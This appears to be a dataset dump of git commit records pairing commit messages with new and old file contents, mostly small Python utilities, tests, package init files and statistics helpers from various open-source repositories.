| commit (string, 40 chars) | subject (string, 4-1.73k chars) | repos (string, 5-127k chars) | old_file (string, 2-751 chars) | new_file (string, 2-751 chars) | new_contents (string, 1-8.98k chars) | old_contents (string, 0-6.59k chars) | license (string, 13 classes) | lang (string, 23 classes) |
---|---|---|---|---|---|---|---|---|
72f9d74fe6503de45e7251460d5419eebcabfb7e | Add files via upload | ScottHull/Exoplanet-Pocketknife | old/hefesto_temp_fix.py | old/hefesto_temp_fix.py | import os
def replace_temp(inputfile_folder):
os.chdir(inputfile_folder)
home_dir = os.getcwd()
for i in os.listdir(os.getcwd()):
if os.path.isdir(i):
os.chdir(i)
print("In folder: {}".format(os.getcwd()))
for z in os.listdir(os.getcwd()):
if '.txt' in z:
with open(z, 'r') as infile:
with open("temp.txt", 'w') as outfile:
print("\nChanging string in file: {}".format(z))
infile_text = infile.read()
s = infile_text.replace(",20,80,1200,0,-2,0", "0,20,80,1600,0,-2,0")
outfile.write(s)
os.remove(z)
os.rename("temp.txt", z)
infile.close()
print("Success! Replaced string in file: {}".format(z))
os.chdir(home_dir)
def initialization():
print("\n\n\n\nPlease specify your HeFESTo input file folder (in Exoplanet Pocketknife format):")
in1 = input("\n>>> ")
if in1 in os.listdir(os.getcwd()):
replace_temp(inputfile_folder=in1)
else:
initialization()
initialization() | cc0-1.0 | Python |
|
816872186966186eb463d1fd45bea3a4c6f68e00 | Add new sanity test for demoproject views | pgollakota/django-chartit,pgollakota/django-chartit,pgollakota/django-chartit | demoproject/tests_demo.py | demoproject/tests_demo.py | from demoproject.urls import urlpatterns
from django.test import Client, TestCase
class DemoProject_TestCase(TestCase):
def setUp(self):
self.client = Client()
def test_all_views_load(self):
"""
A simple sanity test to make sure all views from demoproject
still continue to load!
"""
for url in urlpatterns:
address = url._regex
if address.startswith('^'):
address = '/' + address[1:]
if address.endswith('$'):
address = address[:-1]
response = self.client.get(address)
self.assertEqual(response.status_code, 200)
| bsd-2-clause | Python |
|
2cdf9728bd185fa7a32e4a7f758311594245fae0 | Add proc_suffixes_file.py | daineseh/python_code | file_path/proc_suffixes_file.py | file_path/proc_suffixes_file.py | #!/usr/bin/env python
import os
import re
import sys
SUFFIX_PAT = re.compile(r'(?P<FILE>[a-zA-Z0-9]+)_\d+\b')
SUFFIXED_LIST = []
def is_suffixed_file(dir_path, file_name):
base_name, ext_name = os.path.splitext(file_name)
match_obj = SUFFIX_PAT.match(base_name)
if not match_obj:
return False
no_suffixed_file = os.path.join(dir_path, match_obj.group('FILE') + ext_name)
if not os.path.exists(no_suffixed_file):
return False
return True
def collect_suffixed_file(dir_path, file_name):
if not is_suffixed_file(dir_path, file_name):
return
suffix_file = os.path.join(dir_path, file_name)
SUFFIXED_LIST.append(suffix_file)
def remove_files():
if not SUFFIXED_LIST:
print 'No suffixes file.'
return
SUFFIXED_LIST.sort()
for name in SUFFIXED_LIST:
print name
input_str = raw_input('Do you want to remove this files: [Y/N]')
if input_str.upper() != 'Y':
return
for name in SUFFIXED_LIST:
try:
os.remove(name)
print '%s removed.' % name
except OSError, e:
print e
def main():
if len(sys.argv) < 2:
        print 'Please input a directory.'
return
if not os.path.isdir(sys.argv[1]):
print 'Please input valid path - %s' % sys.argv[1]
return
for dir_path, dir_list, file_list in os.walk(sys.argv[1]):
for file_name in file_list:
collect_suffixed_file(dir_path, file_name)
remove_files()
if __name__ == '__main__':
main()
| mit | Python |
|
286c9c8a6618fc0a87dbe1b50787331986155940 | Create __init__.py | scienceopen/airtools,scienceopen/pyAIRtools,scienceopen/airtools | __init__.py | __init__.py | bsd-3-clause | Python |
||
959aecd612f66eee22e179f985227dbb6e63202a | Move buckling calcs to continuum_analysis | dashdotrobot/bike-wheel-calc | __init__.py | __init__.py | from abaqus_model import *
from abaqus_postproc import *
from continuum_analysis import *
from rayleighritz import RayleighRitzDiscrete
from stiffcalc import *
| mit | Python |
|
6d2735035d7230e6a709f66be93b760531a42868 | Create __init__.py | gldmt-duke/CokerAmitaiSGHMC,gldmt-duke/CokerAmitaiSGHMC | __init__.py | __init__.py | mit | Python |
||
662b0754ea73ef9dc19c50ac8d9b3e2aaa7fbb02 | Create __init__.py | agitatedgenius/redbot,bhagirathbhard/redbot | __init__.py | __init__.py | mit | Python |
||
05a6080eed951f80da3b6f7ee4962101884f328e | add testing utility for checking term lookback windows | quantopian/zipline,humdings/zipline,humdings/zipline,quantopian/zipline | zipline/pipeline/factors/testing.py | zipline/pipeline/factors/testing.py | import numpy as np
from zipline.testing.predicates import assert_equal
from .factor import CustomFactor
class IDBox(object):
"""A wrapper that hashs to the id of the underlying object and compares
equality on the id of the underlying.
Parameters
----------
ob : any
The object to wrap.
Attributes
----------
ob : any
The object being wrapped.
Notes
-----
This is useful for storing non-hashable values in a set or dict.
"""
def __init__(self, ob):
self.ob = ob
def __hash__(self):
return id(self)
def __eq__(self, other):
if not isinstance(other, IDBox):
return NotImplemented
return id(self.ob) == id(other.ob)
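# Illustrative note (not part of the original source): identity-based equality
# means two boxes compare equal only when they wrap the very same object.
#   a = [1, 2]
#   IDBox(a) == IDBox(a)            # True  -- same underlying object
#   IDBox([1, 2]) == IDBox([1, 2])  # False -- equal values, distinct objects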
class CheckWindowsFactor(CustomFactor):
"""A custom factor that makes assertions about the lookback windows that
it gets passed.
Parameters
----------
input_ : Term
The input term to the factor.
window_length : int
The length of the lookback window.
expected_windows : dict[int, dict[pd.Timestamp, np.ndarray]]
For each asset, for each day, what the expected lookback window is.
Notes
-----
The output of this factor is the same as ``Latest``. Any assets or days
not in ``expected_windows`` are not checked.
"""
params = ('expected_windows',)
def __new__(cls, input_, window_length, expected_windows):
return super(CheckWindowsFactor, cls).__new__(
cls,
inputs=[input_],
dtype=input_.dtype,
window_length=window_length,
expected_windows=frozenset(
(k, IDBox(v)) for k, v in expected_windows.items()
),
)
def compute(self, today, assets, out, input_, expected_windows):
for asset, expected_by_day in expected_windows:
expected_by_day = expected_by_day.ob
col_ix = np.searchsorted(assets, asset)
if assets[col_ix] != asset:
raise AssertionError('asset %s is not in the window' % asset)
try:
expected = expected_by_day[today]
except KeyError:
pass
else:
expected = np.array(expected)
actual = input_[:, col_ix]
assert_equal(actual, expected)
# output is just latest
out[:] = input_[-1]
| apache-2.0 | Python |
|
d3a684b06d2d61f2a498346f78a5cbbabd7828e7 | Create elastic_search.py | amitsaha/learning,amitsaha/learning,amitsaha/learning,amitsaha/learning,amitsaha/learning,amitsaha/learning,amitsaha/learning,amitsaha/learning,amitsaha/learning,amitsaha/learning,amitsaha/learning | misc/elastic_search.py | misc/elastic_search.py | import requests
import json
import pprint
es = 'http://hostt:9200/'
query = '''
{'fields': ['field1', 'field2',],
'filter': {'bool': {'must': [{'terms': {'field1': [1,
2]}},
{'bool': {'should': [{'term': {'field2': 'p'}},
{'bool': {'must': [{'term': {'field3': 'interesting'}},
]
}
}
]
}
}
]
}
}
'from': 0,
'query': {'match_all': {}},
'size': 100,
'search_type': 'scan',
}
'''
index = '/index-name'
method = '/_search'
payload = json.dumps(query)
res = requests.get(es + index + method, data=payload)
pprint.pprint(res.json())
| unlicense | Python |
|
7bf376c57cc989f382f6a1cdc6a5f956b2c73fd6 | Add pixels_with_value() | ronrest/convenience_py,ronrest/convenience_py | ml/img/segmentation.py | ml/img/segmentation.py | import numpy as np
def pixels_with_value(img, val):
return np.all(img==np.array(val), axis=2)
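# Usage sketch (illustrative; assumes an H x W x 3 image array):
# pixels_with_value(img, [255, 0, 0]) returns an H x W boolean mask that is
# True exactly where every channel of a pixel matches the given value.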
| apache-2.0 | Python |
|
13c40d631c5d0e6035ea143a68e45201691b46a5 | Create 0303_restaurant_plural_foods.py | boisvert42/npr-puzzle-python | 2019/0303_restaurant_plural_foods.py | 2019/0303_restaurant_plural_foods.py | # -*- coding: utf-8 -*-
"""
NPR 2019-03-03
https://www.npr.org/2019/03/03/699735287/sunday-puzzle-in-this-game-a-chance-to-claim-vic-tor-y
Name a popular restaurant chain in two words.
Its letters can be rearranged to spell some things to eat and some things to drink.
Both are plural words. What things are these, and what's the chain?
"""
import sys
sys.path.append('..')
import nprcommontools as nct
import json
#%%
# Get a list of restaurants
restaurants = nct.wikipedia_category_members('Restaurant_chains_in_the_United_States',3)
# Two-word restaurants
good_restaurants = set(x for x in restaurants if x.count(' ') == 1)
#%%
# Food and drink are both under the category 'food' in Wordnet
food_and_drink = nct.get_category_members('food')
#%%
# Get plurals of foods
with open(r'../plurals.json','r') as fid:
plurals1 = json.load(fid)
plurals = set()
for word,pls in plurals1.items():
if word in food_and_drink:
for pl in pls:
plurals.add(pl)
#%%
# All sorted strings consisting of two plurals
plural_dict = dict()
plurals_list = list(plurals)
for i in range(len(plurals_list)):
for j in range(i+1,len(plurals_list)):
plural_dict[nct.sort_string(nct.alpha_only(plurals_list[i]+plurals_list[j]))] = (plurals_list[i],plurals_list[j])
#%%
for r in good_restaurants:
r_sorted = nct.sort_string(nct.alpha_only(r.lower()))
if r_sorted in plural_dict:
print(r,plural_dict[r_sorted])
| cc0-1.0 | Python |
|
bfdac16ca4e0ae30e345b221c7754f19669a55da | update full version of criteria module. | biokit/biokit,biokit/biokit | biokit/stats/criteria.py | biokit/stats/criteria.py | # -*- coding: utf-8 -*-
import math
__all__ = ['AIC', 'AICc', 'BIC']
def AIC(L, k):
"""Return Akaike information criterion (AIC)
:param int k: number of parameters
:param float L: maximised value of the likelihood function
Suppose that we have a statistical model of some data, from which we computed
its likelihood function and let k be the number of parameters in the model
(i.e. degrees of freedom). Then the AIC value is ::
:math:`\mathrm{AIC} = 2k - 2\ln(L)`
Given a set of candidate models for the data, the preferred model is the one
with the minimum AIC value. Hence AIC rewards goodness of fit (as assessed
by the likelihood function), but it also includes a penalty that is an
increasing function of the number of estimated parameters. The penalty
discourages overfitting.
Suppose that there are R candidate models AIC1, AIC2, AIC3, AICR.
Let AICmin be the minimum of those values. Then, exp((AICmin - AICi)/2)
can be interpreted as the relative probability that the ith model
minimizes the (estimated) information loss.
Suppose that there are three candidate models, whose AIC values are 100,
102, and 110. Then the second model is exp((100 - 102)/2) = 0.368 times
as probable as the first model to minimize the information loss. Similarly,
the third model is exp((100 - 110)/2) = 0.007 times as probable as
the first model, which can therefore be discarded.
With the remaining two models, we can (1) gather more data, (2) conclude
that the data is insufficient to support selecting one model from among
the first two (3) take a weighted average of the first two models,
with weights 1 and 0.368.
The quantity exp((AICmin - AICi)/2) is the relative likelihood of model i.
If all the models in the candidate set have the same number of parameters,
then using AIC might at first appear to be very similar to using the
likelihood-ratio test. There are, however, important distinctions.
In particular, the likelihood-ratio test is valid only for nested models,
whereas AIC (and AICc) has no such restriction.
Reference: Burnham, K. P.; Anderson, D. R. (2002), Model Selection and
Multimodel Inference: A Practical Information-Theoretic Approach (2nd ed.),
Springer-Verlag, ISBN 0-387-95364-7.
"""
return 2*k -2 * math.log(L)
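# Worked example, following the docstring above: for candidate models with
# AIC values 100, 102 and 110, the relative likelihoods versus the best model
# are exp((100 - 102) / 2) = exp(-1) ~= 0.368 and
# exp((100 - 110) / 2) = exp(-5) ~= 0.007, so the third model can be discarded.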
def AICc(L, k, n):
"""AICc criteria
:param int k: number of parameters
:param int n: sample size
:param float L: maximised value of the likelihood function
AIC with a correction for finite sample sizes.
The formula for AICc depends upon the statistical model.
Assuming that the model is univariate, linear, and has normally-distributed
residuals (conditional upon regressors), the formula for AICc is as follows:
AICc is essentially AIC with a greater penalty for extra parameters.
Using AIC, instead of AICc, when n is not many times larger than k2, increases
the probability of selecting models that have too many parameters, i.e. of
overfitting. The probability of AIC overfitting can be substantial, in some cases.
"""
res = AIC(L, k) + 2*k*(k+1.) / (n-k-1.)
return res
def BIC(L, k, n):
"""Bayesian information criterion
Given any two estimated models, the model with the lower value of BIC is the one to be preferred.
"""
res = -2 * math.log(L) + k * (math.log(n) - math.log(2 * math.pi))
# For large n
#res = -2 * math.log(L) + k * math.log(n)
return res
| bsd-2-clause | Python |
|
ed46c3887c7b51cd75d46523af7b901b79eb92fc | add import script for Milton Keynes (closes #863) | chris48s/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations,chris48s/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations,chris48s/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations | polling_stations/apps/data_collection/management/commands/import_milton_keynes.py | polling_stations/apps/data_collection/management/commands/import_milton_keynes.py | from data_collection.management.commands import BaseXpressDemocracyClubCsvImporter
class Command(BaseXpressDemocracyClubCsvImporter):
council_id = 'E06000042'
addresses_name = 'parl.2017-06-08/Version 1/Democracy_Club__08June2017 (1).tsv'
stations_name = 'parl.2017-06-08/Version 1/Democracy_Club__08June2017 (1).tsv'
elections = ['parl.2017-06-08']
csv_delimiter = '\t'
| bsd-3-clause | Python |
|
4f042e64e3155abfc4b86f61623a4d999dad0f89 | Move tinyHttpServer.py | amsehili/genRSS | tinyHttpServer.py | tinyHttpServer.py | import SimpleHTTPServer
import SocketServer
PORT = 8080
try:
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", PORT), Handler)
print("serving at port %d" % (PORT))
print("Type Ctrl+C to quit")
httpd.serve_forever()
except KeyboardInterrupt as e:
print("\nserver stopped\nBye...")
| mit | Python |
|
5fb6b31ea928162c5185d66381ae99c7454d33c0 | Add comb sort algorithm | TheAlgorithms/Python | sorts/comb_sort.py | sorts/comb_sort.py | """
Comb sort is a relatively simple sorting algorithm originally designed by Wlodzimierz Dobosiewicz in 1980.
Later it was rediscovered by Stephen Lacey and Richard Box in 1991. Comb sort improves on bubble sort.
This is a pure Python implementation of the comb sort algorithm
For doctests run following command:
python -m doctest -v comb_sort.py
or
python3 -m doctest -v comb_sort.py
For manual testing run:
python comb_sort.py
"""
def comb_sort(data):
"""Pure implementation of comb sort algorithm in Python
:param collection: some mutable ordered collection with heterogeneous
comparable items inside
:return: the same collection ordered by ascending
Examples:
>>> comb_sort([0, 5, 3, 2, 2])
[0, 2, 2, 3, 5]
>>> comb_sort([])
[]
>>> comb_sort([-2, -5, -45])
[-45, -5, -2]
"""
shrink_factor = 1.3
gap = len(data)
swapped = True
i = 0
while gap > 1 or swapped:
# Update the gap value for a next comb
gap = int(float(gap) / shrink_factor)
swapped = False
i = 0
while gap + i < len(data):
if data[i] > data[i+gap]:
# Swap values
data[i], data[i+gap] = data[i+gap], data[i]
swapped = True
i += 1
return data
if __name__ == '__main__':
try:
raw_input # Python 2
except NameError:
raw_input = input # Python 3
user_input = raw_input('Enter numbers separated by a comma:\n').strip()
unsorted = [int(item) for item in user_input.split(',')]
print(comb_sort(unsorted))
| mit | Python |
|
2ed853301e8cedb72c7c07367d58e55cac23aa7c | add PI to arduino | winlinvip/raspi-tools,winlinvip/raspi-tools | raspi-pl2303.py | raspi-pl2303.py | #!/usr/bin/env python
import serial
print 'RaspberryPi PL2303(USB2SerialTTL) communicate.'
print "Copyright (c) 2015 winlin([email protected])"
f = serial.Serial('/dev/ttyUSB0', 115200)
while True:
v = "Hello, Arduino, this is RaspberryPi 2.0~"
f.write(v)
print 'PI: %s'%(v)
r = ''
for i in v:
r += f.read()
print 'Arduino: %s'%(r) | mit | Python |
|
30412406b354f510a7321c3b3a159df6d7743668 | Add a database file for Loren to complete | stuy-tetrabyte/graduation-req-tracker | utils/database.py | utils/database.py | import database_setup
assert(database_setup.is_table_set_up())
# TODO: Create the stubs for database files
# Assignee: Loren
| mit | Python |
|
929abedc5f971a58dfb54b706c66548609351835 | Create fair_warning.py | py-in-the-sky/challenges,py-in-the-sky/challenges,py-in-the-sky/challenges | google-code-jam/fair_warning.py | google-code-jam/fair_warning.py | """
https://code.google.com/codejam/contest/433101/dashboard#s=p1
"""
def gcd(a, b):
if b > a:
return gcd(b, a)
elif b == 0:
return a
else:
return gcd(b, a % b)
def big_gcd(a):
return reduce(lambda x,y: gcd(x, y), a)
def solve(nums):
nums = sorted(nums)
diffs = [(nums[i] - nums[i-1]) for i in xrange(1, len(nums))]
T = big_gcd(diffs)
n = nums[0]
return 0 if n % T == 0 else T - (n % T)
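# Why this works (explanatory note): all the given times are congruent modulo
# T = gcd of their pairwise differences, and the consecutive differences of the
# sorted list yield the same T. The answer is the smallest non-negative y that
# makes nums[0] + y (and therefore every nums[i] + y) a multiple of T.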
def main():
C = int(raw_input())
for c in xrange(1, C+1):
nums = map(int, raw_input().strip().split())
print 'Case #{}: {}'.format(c, solve(nums[1:]))
if __name__ == '__main__':
main()
| mit | Python |
|
b7a019b41cbfac78ff48fe604d401921786d7459 | Add size_continuous_layer helper tests | CartoDB/cartoframes,CartoDB/cartoframes | test/viz/helpers/test_size_continuous_layer.py | test/viz/helpers/test_size_continuous_layer.py | import unittest
from unittest.mock import Mock
from cartoframes.viz import helpers, Source
class TestSizeContinuousLayerHelper(unittest.TestCase):
def test_helpers(self):
"should be defined"
self.assertNotEqual(helpers.size_continuous_layer, None)
def test_size_continuous_layer(self):
"should create a layer with the proper attributes"
layer = helpers.size_continuous_layer(
source='sf_neighborhoods',
value='name'
)
self.assertNotEqual(layer.style, None)
self.assertEqual(layer.style._style['point']['width'], 'ramp(linear(sqrt($name), sqrt(globalMin($name)), sqrt(globalMax($name))), [2, 50])')
self.assertEqual(layer.style._style['line']['width'], 'ramp(linear($name), [1, 10])')
self.assertEqual(layer.style._style['point']['color'], 'opacity(#F46D43, 0.8)')
self.assertEqual(layer.style._style['line']['color'], 'opacity(#4CC8A3, 0.8)')
self.assertNotEqual(layer.popup, None)
self.assertEqual(layer.popup._hover, [{
'title': 'name',
'value': '$name'
}])
self.assertNotEqual(layer.legend, None)
self.assertEqual(layer.legend._type, 'size-continuous')
self.assertEqual(layer.legend._title, 'name')
self.assertEqual(layer.legend._description, '')
def test_size_continuous_layer_point(self):
"should create a point type layer"
layer = helpers.size_continuous_layer(
'sf_neighborhoods',
'name',
'Neighborhoods',
size=[10, 20],
color='blue'
)
self.assertEqual(
layer.style._style['point']['width'],
'ramp(linear(sqrt($name), sqrt(globalMin($name)), sqrt(globalMax($name))), [10, 20])'
)
self.assertEqual(
layer.style._style['point']['color'],
'opacity(blue, 0.8)'
)
def test_size_continuous_layer_line(self):
"should create a line type layer"
Source._get_geom_type = Mock(return_value='line')
layer = helpers.size_continuous_layer(
'sf_neighborhoods',
'name',
'Neighborhoods',
size=[10, 20],
color='blue'
)
self.assertEqual(
layer.style._style['line']['width'],
'ramp(linear($name), [10, 20])'
)
self.assertEqual(
layer.style._style['line']['color'],
'opacity(blue, 0.8)'
)
| bsd-3-clause | Python |
|
e79445de75721b0d0b8ab1b6c8e24f036bf35a11 | make qsub | Paul-St-Young/solid_hydrogen | nexus_obj/ascii_txt.py | nexus_obj/ascii_txt.py | import os
def qsub_file(fnames,nmpi=64,title='title',hours=2):
header = """#!/bin/bash
#PBS -N %s
#PBS -l walltime=0%d:00:00
#PBS -l nodes=%d
#PBS -A mat158
#PBS -j oe
#PBS -k n
cd ${PBS_O_WORKDIR}
export OMP_NUM_THREADS=8
BIN=~/soft/kylin_qmcpack/qmcpack_cpu_comp\n\n""" % (
title,
hours,
len(fnames)*nmpi/2
)
body = 'cwd=`pwd`\n'
for floc in fnames:
fname = os.path.basename(floc)
rundir = os.path.dirname(floc)
move_cmd = 'cd '+rundir
run_cmd = 'aprun -n %d -d 8 -S 1 $BIN '%nmpi + fname + ' > out 2> err&'
body += '\n'.join([move_cmd,run_cmd,'cd $cwd']) + '\n'
# end for fname
body += '\nwait'
text = header + body
return text
# end def qsub_file
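# Usage sketch (file names below are hypothetical):
#   qsub_file(['run1/vmc.xml', 'run2/dmc.xml'], nmpi=64)
# emits a PBS header requesting len(fnames)*nmpi/2 = 64 nodes and one
# backgrounded `aprun -n 64 -d 8` launch per input file, followed by `wait`.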
| mit | Python |
|
430c5301d7db50b153b0ae33f5c281506948099c | Add new package | valsdav/plastex,valsdav/plastex,mungerd/plastex,mungerd/plastex,mungerd/plastex,mungerd/plastex,valsdav/plastex,dav94/plastex,dav94/plastex,dav94/plastex,valsdav/plastex,dav94/plastex | plasTeX/Packages/afterpage.py | plasTeX/Packages/afterpage.py | #!/usr/bin/env python
from plasTeX import Command, Environment
class afterpage(Command):
args = 'self:nox'
def invoke(self, tex):
super(afterpage, self).invoke(tex)
return []
| mit | Python |
|
b40eb5723eeab38edb2440d04d65f1c5be4ad4c0 | Create solution.py | lilsweetcaligula/Algorithms,lilsweetcaligula/Algorithms,lilsweetcaligula/Algorithms | data_structures/linked_list/problems/anagrams/py/solution.py | data_structures/linked_list/problems/anagrams/py/solution.py | import LinkedList
# Problem description:
# Solution time complexity:
# Comments:
# Linked List Node inside the LinkedList module is declared as:
#
# class Node:
# def __init__(self, val, nxt=None):
# self.val = val
# self.nxt = nxt
#
def AreAnagrams(left: LinkedList.Node, right: LinkedList.Node) -> bool:
raise NotImplementedError()
| mit | Python |
|
e9a71173eae28b378052ddce4e0fe8a3d3313c4e | Disable screenshot_sync_tests on Mac. | jaruba/chromium.src,Jonekee/chromium.src,ondra-novak/chromium.src,Just-D/chromium-1,jaruba/chromium.src,TheTypoMaster/chromium-crosswalk,littlstar/chromium.src,axinging/chromium-crosswalk,Chilledheart/chromium,markYoungH/chromium.src,mohamed--abdel-maksoud/chromium.src,fujunwei/chromium-crosswalk,mohamed--abdel-maksoud/chromium.src,Just-D/chromium-1,dednal/chromium.src,dednal/chromium.src,mohamed--abdel-maksoud/chromium.src,Fireblend/chromium-crosswalk,littlstar/chromium.src,Pluto-tv/chromium-crosswalk,mohamed--abdel-maksoud/chromium.src,PeterWangIntel/chromium-crosswalk,littlstar/chromium.src,Jonekee/chromium.src,bright-sparks/chromium-spacewalk,dednal/chromium.src,hgl888/chromium-crosswalk,hgl888/chromium-crosswalk-efl,Pluto-tv/chromium-crosswalk,chuan9/chromium-crosswalk,markYoungH/chromium.src,chuan9/chromium-crosswalk,Jonekee/chromium.src,PeterWangIntel/chromium-crosswalk,mohamed--abdel-maksoud/chromium.src,axinging/chromium-crosswalk,markYoungH/chromium.src,jaruba/chromium.src,mohamed--abdel-maksoud/chromium.src,fujunwei/chromium-crosswalk,Just-D/chromium-1,markYoungH/chromium.src,jaruba/chromium.src,TheTypoMaster/chromium-crosswalk,dushu1203/chromium.src,jaruba/chromium.src,krieger-od/nwjs_chromium.src,crosswalk-project/chromium-crosswalk-efl,hgl888/chromium-crosswalk,markYoungH/chromium.src,chuan9/chromium-crosswalk,jaruba/chromium.src,M4sse/chromium.src,PeterWangIntel/chromium-crosswalk,chuan9/chromium-crosswalk,dednal/chromium.src,hgl888/chromium-crosswalk-efl,PeterWangIntel/chromium-crosswalk,bright-sparks/chromium-spacewalk,ltilve/chromium,jaruba/chromium.src,dushu1203/chromium.src,dushu1203/chromium.src,littlstar/chromium.src,Just-D/chromium-1,krieger-od/nwjs_chromium.src,Pluto-tv/chromium-crosswalk,chuan9/chromium-crosswalk,littlstar/chromium.src,ondra-novak/chromium.src,hgl888/chromium-crosswalk-efl,axinging/chromium-crosswalk,bright-sparks/chromium-spacewalk,ondra-novak/chromium.src,crosswalk-project/chromium-crosswalk-efl,krieger-od/nwjs_chromium.src,dushu1203/chromium.src,dushu1203/chromium.src,Fireblend/chromium-crosswalk,hgl888/chromium-crosswalk-efl,M4sse/chromium.src,Chilledheart/chromium,Pluto-tv/chromium-crosswalk,TheTypoMaster/chromium-crosswalk,crosswalk-project/chromium-crosswalk-efl,ltilve/chromium,Chilledheart/chromium,ondra-novak/chromium.src,TheTypoMaster/chromium-crosswalk,Chilledheart/chromium,bright-sparks/chromium-spacewalk,ondra-novak/chromium.src,dushu1203/chromium.src,hgl888/chromium-crosswalk-efl,chuan9/chromium-crosswalk,hgl888/chromium-crosswalk-efl,Jonekee/chromium.src,jaruba/chromium.src,Chilledheart/chromium,TheTypoMaster/chromium-crosswalk,fujunwei/chromium-crosswalk,mohamed--abdel-maksoud/chromium.src,chuan9/chromium-crosswalk,Jonekee/chromium.src,dushu1203/chromium.src,crosswalk-project/chromium-crosswalk-efl,markYoungH/chromium.src,Just-D/chromium-1,ltilve/chromium,Fireblend/chromium-crosswalk,crosswalk-project/chromium-crosswalk-efl,bright-sparks/chromium-spacewalk,Jonekee/chromium.src,dednal/chromium.src,bright-sparks/chromium-spacewalk,M4sse/chromium.src,ltilve/chromium,Pluto-tv/chromium-crosswalk,ondra-novak/chromium.src,fujunwei/chromium-crosswalk,axinging/chromium-crosswalk,crosswalk-project/chromium-crosswalk-efl,dushu1203/chromium.src,axinging/chromium-crosswalk,axinging/chromium-crosswalk,jaruba/chromium.src,Chilledheart/chromium,dednal/chromium.src,ltilve/chromium,littlstar/chromium.src,Jonekee/chromium.src,crosswalk-project/chromium-crosswalk-efl,ltil
ve/chromium,Fireblend/chromium-crosswalk,TheTypoMaster/chromium-crosswalk,axinging/chromium-crosswalk,M4sse/chromium.src,Fireblend/chromium-crosswalk,krieger-od/nwjs_chromium.src,Jonekee/chromium.src,Pluto-tv/chromium-crosswalk,ondra-novak/chromium.src,ondra-novak/chromium.src,fujunwei/chromium-crosswalk,bright-sparks/chromium-spacewalk,ltilve/chromium,axinging/chromium-crosswalk,Pluto-tv/chromium-crosswalk,hgl888/chromium-crosswalk-efl,M4sse/chromium.src,dushu1203/chromium.src,PeterWangIntel/chromium-crosswalk,krieger-od/nwjs_chromium.src,krieger-od/nwjs_chromium.src,krieger-od/nwjs_chromium.src,Just-D/chromium-1,markYoungH/chromium.src,M4sse/chromium.src,Fireblend/chromium-crosswalk,Jonekee/chromium.src,littlstar/chromium.src,PeterWangIntel/chromium-crosswalk,TheTypoMaster/chromium-crosswalk,chuan9/chromium-crosswalk,M4sse/chromium.src,TheTypoMaster/chromium-crosswalk,Just-D/chromium-1,mohamed--abdel-maksoud/chromium.src,dushu1203/chromium.src,fujunwei/chromium-crosswalk,Fireblend/chromium-crosswalk,bright-sparks/chromium-spacewalk,markYoungH/chromium.src,mohamed--abdel-maksoud/chromium.src,Chilledheart/chromium,dushu1203/chromium.src,hgl888/chromium-crosswalk-efl,Just-D/chromium-1,M4sse/chromium.src,hgl888/chromium-crosswalk,mohamed--abdel-maksoud/chromium.src,PeterWangIntel/chromium-crosswalk,Fireblend/chromium-crosswalk,PeterWangIntel/chromium-crosswalk,dednal/chromium.src,fujunwei/chromium-crosswalk,dednal/chromium.src,crosswalk-project/chromium-crosswalk-efl,M4sse/chromium.src,hgl888/chromium-crosswalk,Fireblend/chromium-crosswalk,axinging/chromium-crosswalk,hgl888/chromium-crosswalk,fujunwei/chromium-crosswalk,ondra-novak/chromium.src,krieger-od/nwjs_chromium.src,hgl888/chromium-crosswalk,Pluto-tv/chromium-crosswalk,markYoungH/chromium.src,M4sse/chromium.src,hgl888/chromium-crosswalk-efl,markYoungH/chromium.src,hgl888/chromium-crosswalk,chuan9/chromium-crosswalk,dednal/chromium.src,mohamed--abdel-maksoud/chromium.src,krieger-od/nwjs_chromium.src,axinging/chromium-crosswalk,krieger-od/nwjs_chromium.src,ltilve/chromium,jaruba/chromium.src,jaruba/chromium.src,hgl888/chromium-crosswalk,Jonekee/chromium.src,dednal/chromium.src,krieger-od/nwjs_chromium.src,hgl888/chromium-crosswalk,axinging/chromium-crosswalk,markYoungH/chromium.src,Jonekee/chromium.src,hgl888/chromium-crosswalk-efl,Chilledheart/chromium,fujunwei/chromium-crosswalk,ltilve/chromium,M4sse/chromium.src,Pluto-tv/chromium-crosswalk,dednal/chromium.src,littlstar/chromium.src,bright-sparks/chromium-spacewalk,Chilledheart/chromium,PeterWangIntel/chromium-crosswalk,crosswalk-project/chromium-crosswalk-efl,TheTypoMaster/chromium-crosswalk,Just-D/chromium-1 | content/test/gpu/gpu_tests/screenshot_sync.py | content/test/gpu/gpu_tests/screenshot_sync.py | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import screenshot_sync_expectations as expectations
from telemetry import test
from telemetry.core import util
from telemetry.page import page
from telemetry.page import page_set
from telemetry.page import page_test
# pylint: disable=W0401,W0614
from telemetry.page.actions.all_page_actions import *
data_path = os.path.join(
util.GetChromiumSrcDir(), 'content', 'test', 'data', 'gpu')
class _ScreenshotSyncValidator(page_test.PageTest):
def CustomizeBrowserOptions(self, options):
options.AppendExtraBrowserArgs('--enable-gpu-benchmarking')
def ValidatePage(self, page, tab, results):
test_success = tab.EvaluateJavaScript('window.__testSuccess')
if not test_success:
message = tab.EvaluateJavaScript('window.__testMessage')
raise page_test.Failure(message)
@test.Disabled('mac')
class ScreenshotSyncPage(page.Page):
def __init__(self, page_set, base_dir):
super(ScreenshotSyncPage, self).__init__(
url='file://screenshot_sync.html',
page_set=page_set,
base_dir=base_dir,
name='ScreenshotSync')
self.user_agent_type = 'desktop'
def RunNavigateSteps(self, action_runner):
action_runner.NavigateToPage(self)
action_runner.WaitForJavaScriptCondition(
'window.__testComplete', timeout_in_seconds=120)
class ScreenshotSyncProcess(test.Test):
"""Tests that screenhots are properly synchronized with the frame one which
they were requested"""
test = _ScreenshotSyncValidator
def CreateExpectations(self, page_set):
return expectations.ScreenshotSyncExpectations()
def CreatePageSet(self, options):
ps = page_set.PageSet(file_path=data_path, serving_dirs=[''])
ps.AddPage(ScreenshotSyncPage(ps, ps.base_dir))
return ps
| # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import screenshot_sync_expectations as expectations
from telemetry import test
from telemetry.core import util
from telemetry.page import page
from telemetry.page import page_set
from telemetry.page import page_test
# pylint: disable=W0401,W0614
from telemetry.page.actions.all_page_actions import *
data_path = os.path.join(
util.GetChromiumSrcDir(), 'content', 'test', 'data', 'gpu')
class _ScreenshotSyncValidator(page_test.PageTest):
